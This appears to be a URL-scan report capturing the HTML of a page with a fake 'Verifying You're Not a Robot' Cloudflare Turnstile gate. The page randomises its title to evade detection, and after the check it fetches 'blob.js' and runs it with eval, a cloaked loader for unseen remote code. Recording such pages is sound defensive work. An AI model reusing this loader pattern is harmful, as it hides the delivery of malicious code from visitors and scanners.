https://xy6zy6q.pages.dev/aq9g

Submitted URL:
https://unexpected-ballistic-drink.glitch.me/
Report Finished:

JavaScript Variables · 9 found

Console log messages · 2 found

HTML

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <script src="https://cdn.jsdelivr.net/gh/MeSrabon/randomtitle@main/title.js"></script>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title id="initialTitle">Advanced CSS Techniques</title>
    <script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
        <script>
                function setRandomTitle() {
            const randomIndex = Math.floor(Math.random() * titles.length);
            const randomTitle = titles[randomIndex];
            document.title = randomTitle;
        }

        // Set the title as soon as the script loads
        setRandomTitle();
        // Define the onloadTurnstileCallback function
        window.onloadTurnstileCallback = function () {
            try {
                turnstile.render('#example-container', {
                    sitekey: '0x4AAAAAAAfB6qtp36cx3fc4',
                    callback: function (token) {
                        if (token) {
                            loadAndExecuteAppScript();
                        }
                    },
                    'error-callback': function () {
                        console.error('Error loading Turnstile widget.');
                    },
                });
            } catch (error) {
                console.error('Turnstile failed to initialize:', error);
            }
        };

        function loadAndExecuteAppScript() {
            // Fetch the content of blob.js
            fetch('blob.js')
                .then(response => response.text())
                .then(scriptContent => {
                    // Execute the code using eval
                    try {
                        eval(scriptContent);
                    } catch (error) {
                        console.error('Error executing blob.js:', error);
                    }
                })
                .catch(error => {
                    console.error('Error loading blob.js:', error);
                });
        }
    </script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" async="" defer=""></script>
</head>
<body>
    <div style="display:flex;justify-content:center;align-items:center;text-align:center;flex-direction: column;" id="example-container">
       <br> 
       <p style="display:flex;justify-content:center;align-items:center;text-align:center;flex-direction: column;font-size: 20px;">Verifying You're Not a Robot!!!</p><br>
    <div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-ctzk3_response"></div></div>
    <div id="app-content"></div>


</body></html>